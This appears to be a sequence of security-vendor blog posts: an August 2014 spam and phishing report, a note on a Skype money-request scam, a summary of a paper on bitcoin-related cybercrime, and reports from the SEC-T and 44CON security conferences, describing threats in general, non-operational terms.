In August, fraudulent emails exploited global political events and the names of famous people in the Russian Federation. Malicious files were spread via email, including ones that imitated court summons. Spammers who earn money by advertising medications used popular services to attract the attention of recipients. Spammers also actively advertised travel services and collection agencies.Malicious court summons
In August we registered several mass mailings imitating court summons in various languages. The English-language version informed that the user was being taken to court and should study the case materials to help lodge a defense. Those materials were supposedly in an attachment, which actually contained the Trojan Backdoor.Win32.Kuluoz capable of downloading and running other malware on the victim computer. By comparing several emails from a single mass mailing we confirmed that some details, such as the time, date and venue of the hearing and the names of the archives of malicious files varied from email to email. The sender addresses had been generated from a single template in which the scammers simply entered the words from a pre-determined list. The changes in the text to were intended to provide more individuality and bypass spam filtering.
As well as the English-language versions, similar malicious spam appeared in Russian and Czech. The scammers tried to convince users that they had unpaid debts due within 15 days. If they didn't pay, recipients were warned that their property could be confiscated and their bank accounts frozen.The attached archive contained Trojan-Downloader.Win32.Agent.heva, a malicious file presented by the fraudsters as financial and legal documents. Once the user ran the Trojan, an RTF file was displayed while the malicious program was downloading and installing Trojan.Win32.Tinba.ei, yet another Trojan designed to steal financial information such as bank account credentials and credit card data. The name of the Trojan is an acronym of 'Tinybanker'. This is a small piece of assembler code, but it has the functionalities of many larger pieces of similar malware.
In August, we again came across "Nigerian letters" exploiting the events in Ukraine. In the email written in English the scammers used the name of the former President of Ukraine Viktor Yanukovych to sell their story. This time the popular "Nigerian" trick of asking for help in investing money for a substantial reward came from a former financial adviser to the President, whose money had been secretly transferred to the adviser's personal account in London.
After a long silence the name of Mikhail Khodorkovsky was back again. We came across "Nigerian letters" supposedly written on behalf of his inner circle. To trick readers, the fraudsters spun the standard story offering a reward for assistance in transferring and investing huge sums of money. To make the email look more realistic, the body of the message contained the links to official articles about Khodorkovsky. In addition, it was emphasized that all future transactions were legal and did not present any risk to the victim.
One email provides minimal information, simply asking recipients to contact the scammers if they finds the offer interesting. Another email provides details of a tempting offer and stories from Khodorkovsky's life: before the arrest he couldn't withdraw all money out of Russia and now, after the release, he intends to complete the transfer. However as the disgraced billionaire cannot use his former company to do this, he is looking for someone to help him. Interestingly, "Nigerian" scammers enable recipients to unsubscribe from their mailing list by sending an email to the link at the end of the message. This is how the fraudsters collect a database of active e-mail addresses for the future spam mass mailings.Medication adverts in fake Google Play emails
Spam messages advertising medications regularly offer pills to lose weight, enhance potency or improve the male sex drive. The body of these emails includes a short text with a link to a website of a store where the advertised product can be bought. Sometimes there is just a link. To send out "pharmaceutical" adverts, the fraudsters often use visual spam. However we sometimes see quite unusual tricks to advertise meds. For example, last autumn we wrote in our blog about a series of mailings which used the names of well-known companies and looked just like typical phishing messages. In August 2014, we noted another similar mass mailing.
This time the phishing email looked like a purchase notification from the Google Play app store. To convince the recipient that the email was genuine, the spammers utilized a realistic-looking sender address as well as the store's official logo. Links in the body text of the email, which often lead to pages on the real website, were inactive this time, even though they were highlighted. It seems that the scammers did not think their fake notifications would get through the spam filters so they made their emails look like classic phishing emails.Spammers' Indian summer
The English-language segment of the Internet saw spam mass mailings offering special offer tours to Hawaii or Costa Rica or tropical forests, as well as the chance to book a private jet for business or pleasure. These messages came from various addresses and contained the links to newly created sites where users could compare the prices and select the most attractive offer.
We also noted mailings offering to participate in earn-online programs. These so-called binary options, offering quick and easy income to cover all the costs of the vacation advertised elsewhere.How (not) to repay a loan
Another common theme in August's spam was debt managements for individuals and companies. Spammers send out colorful messages urging things like "Only pay what you can afford" and promised to wipe out crippling debts. The hyperlink in the email led to a newly created blank site with a name like "Zero-debt-now" with offers of consolidated loans (i.e. to get one credit for paying several others) or favorable credit terms.
Various collection and private lawyers, meanwhile, offer the opposite: specialized services to collect unpaid debts without slow and costly court proceedings. The advertising emails provided a brief description of the activities of the organization, the details of its work, a few statistics (number of collected loans, the number of satisfied customers, etc.) and included a contact phone number. The digits in the telephone numbers were often deliberately distorted or noised to bypass spam filters. The authors of the messages promised a successful outcome even in cases where other specialized services already have failed.
Percentage of spam in email traffic
The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The amount of unsolicited email increased throughout the month – in early August the percentage of spam averaged 64.9% while in the end it reached 70.4%.Sources of spam by country
In August, the USA remained the most popular source of spam (15,9%), up 0.7 percentage points from the previous month. Russia was in second place with 6%; up 0.4 percentage points. China was in third place with 4.7% having produced 0.6 pp less spam than in July.
Sources of spam around the world
Vietnam was in 4th position with 4.7% of all distributed spam; its contribution grew by 1.2 pp which pushed this country up four places in the rankings. It is followed by Argentina (4.4%) which saw little change in its numbers and dropped one place in the table.
Germany (3.6%) remained in 6th place with a slight decrease in the percentage of distributed spam. Ukraine dropped to 8th. Meanwhile, Brazil (2.9%) added 0.5 pp to its previous month's contribution and placed 9th in August's Top 10, which was rounded up with India (2.8%).
Of note is the slight growth of spammer activity in South Korea (1.9%) which also entered the Top 20 in August.Malicious attachments in email
The graphic below shows the Top 10 malicious programs spread by email in August.
The Top 10 malicious programs spread by email
In August Trojan.JS.Redirector.adf topped the rating of malicious programs most often spread via email. Its name speaks for itself: it is an HTML page containing code that redirects users to a scammer site offering downloads of Binbot, a popular service for automatic online sales of binary options. This malicious program is distributed via email in a ZIP archive which is not password-protected.
Trojan-Downloader.Win32.Upatre.to and Trojan-Downloader.Win32.Upatre.tq were in 3rd and 6th places. These malicious programs are relatively simple, are no more than around 3.5 Kb in size and usually download a Trojan banker from the family known as Dyre/Dyzap/Dyreza. The list of financial organizations targeted by this banker depends on the configuration of the file which is uploaded from the command center.
Trojan-Banker.Win32.Fibbit.rq was fourth. This banking Trojan embeds in Java applications for online banking targeting authentication data and other information, such as keys, transaction replacements and their results.
Backdoor.Win32.Androm.enji and Backdoor.Win32.Androm.erom were fifth and ninth in the ranking. Both malicious programs belong to Andromeda – Gamarue, a universal modular bot with features including downloading, storing and running executable files, downloading DLL (without saving on the disk) and plugins as well as the possibility of self-updating and self-deleting. The functionality of the bot can be expanded using a system of plugins that are loaded by the criminals as required.
Trojan.Win32.Bublik.clhs and Trojan.Win32.Bublik.bwbx, modifications of the notorious Bublik malware, ended in 7th and 8th positions in August. The Bublik malware family is mostly used for the unauthorized download and installation of new versions of malware onto victim computers.
Trojan-Spy.Win32.LssLogger.bos rounded off the Top 10. It is a multifunctional malicious program which is capable of stealing passwords from a wide range of software. All stolen information is then passed to the fraudsters via email.
Distribution of email antivirus detections by country
In August, the UK took the lead with 13.16% of all antivirus detections (+6.26 percentage points). Germany (9.58%, -1.49 percentage points) and the USA (7.69%, -1.59 percentage points) were 2nd and 3rd respectively.
The most unexpected result arrived from Russia: its share grew by 3.33 pp from July and accounted for 6.73% which moved this country from 8th to 4th position in the ranking.
Italy (3.31%) dropped from 5th to 8th place having lost 1.33 percentage points. Hong Kong outran Australia, Turkey and Vietnam with 2.74% of all antivirus detections (+0.28 percentage points).Special features of malicious spam
In August, the scammers again used fake notifications from Facebook to distribute malicious attachments. This time, users received a message from an unknown address warning them about the possible deactivation of their accounts. According to the text, over the last few days (and in some emails - months) the social network was attacked by hackers. To avoid any problems, the developers asked the users to install the utility attached to the email.
Each email contained a password-protected ZIP archive with an executable file and a unique password needed to unpack it. The attached archive bore the name of the user who the email was addressed (his email account login) and the same name was used to generate a password for the archive. At the end of the email the scammers said that the file could be only opened on a PC running under Microsoft OS. The utility in the archive was in fact a Trojan downloader, a representative of the Trojan-Downloader.Win32.Haze family. This malware downloads other malicious software usually developed to steal the owner's personal data or to send out infected emails to the address on his lists of contacts.Phishing
In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. This considerable growth was probably caused by the summer slowdown in the demand for advertising spam. Fraudsters who do not want to lose their earnings switch to mass phishing mailings.
Australia topped the rating of countries most often attacked by phishers: during the month the number of Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. Brazil was 2nd with 19.5% of attacked users. It was followed by the UK (15.2%), Canada (14.6%) and India (14.5%).
The geography of phishing attacks*, August 2014
* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users
Top 10 countries by the percentage of attacked users:Country % of users 1 Australia 24.4 2 Brazil 19.5 3 UK 15.2 4 Canada 14.6 5 India 14.5 6 UAE 14.1 7 Ecuador 13.1 8 Dominican Republic 13.0 9 Austria 12.8 10 China 12.7 Targets of attacks by organization
The statistics on phishing targets are based on detections made by Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page that has not previously been included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in the message in a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning of a potential threat.
In August, there was little change among the organizations most often attacked by phishers. Global Internet Portals remained the leading category with 30.8%; its share increased by 1.3 pp. Social networks came second with 17.3%, a 3.3 pp decline from the previous month. These two categories accounted for more than half of all phishing attacks in August.
Organizations most frequently targeted by phishers, by category – August 2014
Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. The percentage of detections affecting Banks, Online stores and E-payment systems went down 4.9, 1.2 and 0.6 pp respectively.Top 3 organizations most frequently targeted by phishers Organization % detections 1 Google 12.61% 2 Facebook 10.05% 3 Yahoo! 6.38%
In August, Google services were most heavily targeted by phishing links: their share was up 1 pp and had 12.61% of all Anti-Phishing component detections. Second was Facebook, which is traditionally the most popular phishing target. Its contribution increased by 0.4 pp. It is followed by Yahoo! (6.38%). For recap, in July third position was occupied by Windows Live.
In August spam traffic we came across several phishing mailings targeting logins and passwords for Yahoo services! The emails read that Yahoo! administration had registered attempts to enter the user's account from an unidentified device. This activity caused suspicion and the account would be blocked if the recipient did not confirm the username and password on a special page. The body of the email contained two links for verification of the personal data: the first one - to confirm the password and prevent blockage and the second one - to protect the account in case the entry had been performed by anyone else. Both links had the same address and led to the same phishing page. The text of the messages in different mass mailings remained almost unchanged and the design of the emails used the Yahoo! logo.
The phishing page in one mass mailing was an exact copy of the official registration page, but in the other mailing a different background was used.
If you look at the HTML code of the phishing pages, it becomes clear that in the first case the victim's data was sent to the PHP page of the fraudsters while in the second case it was forwarded to an email address registered on a free email service. The HTML code also specified the address which would be entered in the 'From' field as well as the subject of the email. This enabled the fraudsters to identify the information about usernames and passwords received from the users within each mass mailing.
The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The rating of the most popular sources of spam remained unchanged from July – the USA (15,9%), Russia (6%) and China (4.7%).
In August, scammers continued to spread "Nigerian letters" calling for help in the fall-out from the crisis in Ukraine. English-language emails supposedly written on behalf of an associate of the former Ukrainian president Viktor Yanukovych asked for assistance in investing money. Mikhail Khodorkovsky's on-going story was yet another pretext used by scammers to lure money from the victims.
Malicious emails imitating court summons were often seen in August's spam traffic. These messages were written in different languages and the attached malicious files were developed both to steal personal information and to extort money for decrypting files on the victims' computers.
To advertise pharmaceutical spam, scammers used fake notifications from the online Google Play store. The links in them led to pages advertising popular medications.
In August, spammers actively promoted the services of travel and debt collection agencies.
August's list of most widely-distributed malware was topped by Trojan.JS.Redirector.adf. The long-term leader Trojan-Spy.HTML.Fraud.gen maintained 2nd position in the rating.
In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. Australia was the country most often attacked by phishers: during the month the number of the Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. The Global Internet Portals category remained the sector most frequently targeted by phishers (30.8%). Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. Yahoo! entered the Top 3 organizations most frequently targeted by phishers.
It used to be a common scam: Russian cybercriminals would send an SMS like: "Mom, I'm in trouble. Please, transfer me some funds. I will explain it properly when I get home". A whole bunch of friends and relatives got suckered by this fraud, believing that the message had genuinely come from someone close to them.
Fortunately, Russian mobile operators cracked down hard on this, forcing the criminals to give up. But now they've moved on to Skype. Yesterday I got this Skype message from one of my contacts:
Translation of the text:
Hey. I'm on a trip right now and I can't get to a payment terminal and top up my balance. Could you please transfer 100 rubles – or even better 200 – to the number +7925XXXXXXX? I can't think of anyone else who could help me. It would really do me a big favor! I pay you back as soon as I get home!!
What happened? The cybercriminals stole my contact's password, probably using password stealing malware. Suddenly, even a Skype account without any money attached is worth something to a crook.
The victim will never see that couple of hundred rubles again. The number mentioned belongs to the cybercriminals, not to the Skype account-holder. It's impossible to say how many people fall victim to this kind of social engineering fraud, but in general we know that social engineering is an effective trick for scammers.
An interesting title felt just about right for an interesting topic when I first submitted my research paper about the evolution of bitcoin cybercrime for this year's edition of the Virus Bulletin conference, held in the sleepless Seattle. Discussing the situation from an economic standpoint I aimed to paint a picture reflecting how the present geopolitical situation in Latin America makes the region a fertile ground for bitcoin enthusiasts, and by extension, cybercriminals. It's certainly not easy to capture a snapshot of a phenomena that changes so rapidly and present it to a group of security experts who are already well-informed about the subject. Nevertheless, with the aid of regional statistics, incident timelines and analysis of the most interesting malware samples, there is enough information in the report to give some clear indicators about what's been going on with the world's most popular cryptocurrency this past year, and what we can expect in the future when it comes to bitcoin-related cybercrime.
While some early adopters have been involved in the bitcoin market from the beginning (by means of mining or simply by participating in exchanges), others are just grasping the concept of cryptocurrencies and learning about the perils of bitcoin the hard way – be it in the form of ransomware demanding a quick payment or malicious mining code consuming their limited computing resources. From wallet stealing malware to large scale bitcoin exchange heists, we can find just about anything in the cryptoworld, and this is just the beginning. Nowadays, we talk about malware and cybercrime as two sides of the same (bit)coin, usually referring to organized crews of criminals with clearly defined roles engaging in illegal activities with the sole purpose of financial profit. It makes sense then, to observe the correlation between the number of malware samples in the wild targeting bitcoin users and the price of the currency being exchanged on global markets.
As mentioned in 2013's Kaspersky's Security Bulletin, our predictions for the cybercriminal bitcoin ecosystem came true – and then some: "Attacks on Bitcoin pools, exchanges and Bitcoin users will become one of the most high-profile topics of the year. Attacks on stock exchanges will be especially popular with the fraudsters as their cost-to-income ratio is very favorable.
As for Bitcoin users, in 2014 we expect considerable growth in the number of attacks targeting their wallets. Previously, criminals infected victim computers and went on to use them for mining. However, this method is now far less effective than before while the theft of Bitcoins promises cybercriminals huge profits and complete anonymity."
It's a long time since we got through a week without one of the major bitcoin exchanges making headline news. We can attribute the success of some attacks to faulty technical implementations of bitcoin wallets, others relied on clever social engineering approaches, and the rest can be blamed on bad business practices and simple negligence about adhering to already proven security standards. There are just too many incidents to list, but there is a common thread uniting them all, which makes them a great body of experience for future generations of bitcoin exchanges to build on.
We have only recently seen why countries like Argentina and Brazil have become a fertile ground for the adoption of a cryptocurrency economy, and as we realize this, so have too cybercriminals. With a whole new set of frauds, scams and threats facing bitcoin holders, citizens need to be aware that keeping their savings secure in no easy task in today's hyper connected world. Because there are no borders for cryptocurrencies, there are none for criminals either, and following the money trail means landing in Latin America, where the general audience is still widely vulnerable to many attacks seen in other parts of the world.
After the Mt. Gox incident we have witnessed targeted phishing campaigns, bitcoin community members moonlighting as private investigators, localized ransomware samples, scams, mobile miners, internet of things devices participating in botnets, and everything else that this digital bitcoin gold rush has brought upon us.
Alchemy proved possible for cryptocurrency enthusiasts, turning energy into capital, betting on the success and global adoption of their favorite choice. Seen by outsiders as a hobby for geeks, bitcoin is more than a currency, it's a community that has certain values ingrained and it's revolutionizing the financial world as we currently know it.
Collective but anonymous, organized yet decentralized, this ordered chaos is beginning to make sense after all the problems it has faced. The culling of the excess exchanges that used to be available brings a Darwinian equilibrium to the bitcoin ecosystem, forcing the ones left to implement better business practices and security measures.
Malware trends indicate that cybercriminals are migrating from mining botnets and pools to more direct wallet stealing and exchange credential hijacks. The inefficient mining Trojans working on mobile devices proved that accessing the funds stored in the victim's digital wallet can be much more straightforward than putting the effort into building a massive network of miners that reap minimal gains.
Debit Cards linked to bitcoin wallets are starting to appear and this brings another enticing entry point for criminals. With "bitwashing" services becoming more common, tracking stolen funds will prove much more difficult in the future, exposing the true anonymous nature of cryptocurrencies.
Once the de-facto choice for drug dealers and illegal markets, bitcoin is aiming to gain the global trust of other merchants, hoping that it will have a ready-made community to support it when it becomes the default standard for online and offline transactions. You can read the full paper presented at Virus Bulletin here.
What, Where & When: The 0x07th edition of SEC-T, an annual Stockholm-based conference, was held on 18-19 September at the stunning Anrika Nalen venue, just a 15 minute walk from the famous Gamla Stan.
This conference features only one track of presentations, which – in my opinion – is quite a good thing, because you don't have to make any difficult choices This year, besides the regular full-time presentations, the agenda included a couple of 30-minute long "small talks" as well as a bunch of lightning talks of 10-20 minutes each.
The conference kicked off with an excellent speech given by the founder of Recurity Labs, Felix "FX" Lindner, who has proven that an opening keynote doesn't necessarily have to be boring. After lunch, Andreas Lindh presented some really cool attacks on broadband modems, including DNS poisoning and attacks that exploit CSRF vulnerabilities to send or manipulate SMS messages. This was certainly one of my favourite talks, together with the really scary presentation given by Hugo Teso on aviation security. It's terrifying how easily an experienced hacker can exploit aviation protocols and avionics systems to change the on-board system configuration, including changes to the flight path!
Amongst other talks, Meredith L. Patterson highlighted some pressing issues concerning the APIs of popular software, but, apparently, not everybody agrees with her highly-critical point of view. At the beginning of the second day, my colleague, David Jacoby, gave an entertaining presentation on how he hacked his home, including successful attacks on his NAS storage, ISP provided router, smart TV and other devices he found connected to the Internet.
Last, but not least, there were also some short but interesting lightning talks from a number of speakers (including myself :)) on topics such as URL parsing, hard drive cryptography and breaking out of the AngularJS sandbox. I did a short presentation about my background research on the current threat landscape for SOHO devices, which turned out to be quite in line with the conference's theme, featuring research on vulnerabilities in the so-called Internet-of-Things.
In conclusion, this was a really nice conference, profiting from its one-track only schedule, very high-quality presentations and unique atmosphere. Congrats to the whole SEC-T crew – really good job, guys! And see you all next year!
What, Where & When: the 4th edition of 44CON, an annual IT Security Conference organized by Sense/Net Ltd, took place on 10-12 September in London, at a venue near the Earl's Court exhibition center. Geeks, who happened to enjoy somewhat spooky historical monuments, could take a five minute walk from the venue to visit an old and impressive cemetery, one of the London's Magnificent Seven.
The Schedule this year was packed with three tracks of (mostly) 1h long presentations within a wide range of topics: from social engineering to exploitation techniques, from crypto-currencies to IoT related threats, to GSM hacking. Some amazing workshops were running simultaneously in rooms that were bearing the familiar names of AES, 2DES and Blowfish.
This year's Badge is not only extremely handsome, but also may turn out to be very handy, at least for hardware-oriented researchers, as it happens to be a BusBlaster v3 board, especially customized for 44CON (you can find the full specification here). This small cute thingy can be used to program and debug embedded ARM devices.
With so many things going on simultaneously, it was impossible to fully attend even a third of them. Moreover, the online schedule didn't include the description of the talks, so in some cases choosing the right track in advance was kind of a lottery. Nevertheless, the overall quality of presentations was so high, that no matter which talks you chose, you always ended up with some new, valuable information.
From the selection of very good talks I attended, here are my favourite ones:
- "Researching Android devices security with the help of a droid army", by Joshua J. Drake (@jduck) in which – in a quite entertaining way – Joshua explained how and why he built his research lab, capable of testing 40+ Android devices at the same time. I was really impressed by the framework Joshua invented for managing his "droid army".
- "I hunt TR-069 Admins: pwning ISPs like a boss", by Shahar Tal (@jifa). This talk was especially interesting to me, as I'm currently involved in researching threats for small network devices, such as residential gateways (aka SOHO routers), from which a fair share is using the TR-069 protocol to talk to the ISP's Auto Configuration Servers. It turns out (not really surprisingly, if you ask me), that this protocol is poorly secured and highly vulnerable, and might be exploited in a way that could affect a whole set of devices. And the worst thing about it is that the average user can't do much to improve the security of their network, even if they have sufficient knowledge. Most of the responsibility lies with the service providers, together with hardware vendors, who don't seem concerned enough about security issues...
- "On Her Majesty's Secret Service: GRX and Spy Agency", by Stephen Kho and Rob Kuiters. This quite an intriguing talk on how and why GCHQ hacked the Belgian GRX provider was given by experts from the KPN CISO team and concluded the 2nd day of the conference. The first part of the talk was a technical description of the GRX protocol, it's functionality and weaknesses, and which kind of information can be leaked; in the second part the speakers presented the results of "extensive network scanning" that they conducted during the last several months. It's really scary that there are a lot of devices running vulnerable and *terribly* outdated software on GRX networks.
The Networking has been made easier with Gin O'Clock, a one-hour break in the afternoon schedule (on both conference days), which was especially dedicated for human interaction and socialization in the intimate atmosphere of the conference bar. A traditional red double-decker bus was there to provide British ale, cider and Pimm's; every attendee was also offered a free glass of gin & tonic.
Some of The Materials have already been published and they are available at Slideshare.
Overall, The Experience was really great and we are looking forward to attending the next 44CON in 2015!